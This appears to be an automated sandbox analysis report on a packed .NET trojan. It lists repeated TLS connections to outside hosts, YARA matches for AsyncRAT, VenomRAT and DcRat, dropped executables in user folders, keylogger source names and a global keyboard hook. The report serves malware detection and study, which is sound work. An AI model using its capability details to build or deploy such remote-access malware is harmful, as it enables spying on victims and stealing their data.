Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61098
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61099
Source: unknown	Network traffic detected: HTTP traffic on port 61184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61150
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61271
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61151
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61272
Source: unknown	Network traffic detected: HTTP traffic on port 61289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61300 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61323 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61149
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61029
Source: unknown	Network traffic detected: HTTP traffic on port 61240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61141
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61262
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61142
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61263
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61143
Source: unknown	Network traffic detected: HTTP traffic on port 61252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61264
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61144
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61265
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61145
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61146
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61267
Source: unknown	Network traffic detected: HTTP traffic on port 61128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61147
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61268
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61269
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61280
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61160
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61281
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61040
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61282
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61283
Source: unknown	Network traffic detected: HTTP traffic on port 61263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61273
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61153
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61274
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61275
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61276
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61277
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61157
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61158
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61279
Source: unknown	Network traffic detected: HTTP traffic on port 61014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61159
Source: unknown	Network traffic detected: HTTP traffic on port 61278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61290
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61170
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61291
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61171
Source: unknown	Network traffic detected: HTTP traffic on port 61251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61292
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61051
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61293
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61294
Source: unknown	Network traffic detected: HTTP traffic on port 61197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61284
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61043
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61285
Source: unknown	Network traffic detected: HTTP traffic on port 61290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61044
Source: unknown	Network traffic detected: HTTP traffic on port 61036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61239 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61286
Source: unknown	Network traffic detected: HTTP traffic on port 61311 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61287
Source: unknown	Network traffic detected: HTTP traffic on port 61185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61288
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61289
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61048
Source: unknown	Network traffic detected: HTTP traffic on port 61013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61180
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61183
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61184
Source: unknown	Network traffic detected: HTTP traffic on port 61322 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61262 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61295
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61175
Source: unknown	Network traffic detected: HTTP traffic on port 61217 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61296
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61297
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61298
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61299
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61059
Source: unknown	Network traffic detected: HTTP traffic on port 61163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61101 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61164 -> 443

Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:61014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61038 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:61040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61065 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61079 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61110 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61113 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61116 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61120 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61131 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61132 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61134 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61136 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61137 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61139 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61140 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61142 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61145 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61146 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61153 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61164 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61177 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61183 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61184 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61187 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61189 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61190 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61193 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61195 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61199 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61203 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61205 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61209 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61211 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61216 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61217 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61218 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61220 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61221 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61223 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61225 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61226 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61227 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61228 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61231 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61232 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61234 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61236 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61243 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61244 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61245 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61247 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61248 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61251 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61252 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61255 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61256 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61258 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61259 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61262 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61266 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61271 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61282 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61289 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61291 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61297 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61298 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61300 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61301 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61302 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61304 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61306 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61307 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61310 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61311 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61317 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61320 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61321 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61324 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6152, type: MEMORYSTR

Contains functionality to log keystrokes (.Net Source)

Source: Client.exe.0.dr, Keylogger.cs	.Net Code: KeyboardLayout
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout

Installs a global keyboard hook

Source: C:\Users\user\AppData\Roaming\Loader.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Loader.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 20.2.Loader.exe.1d000000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
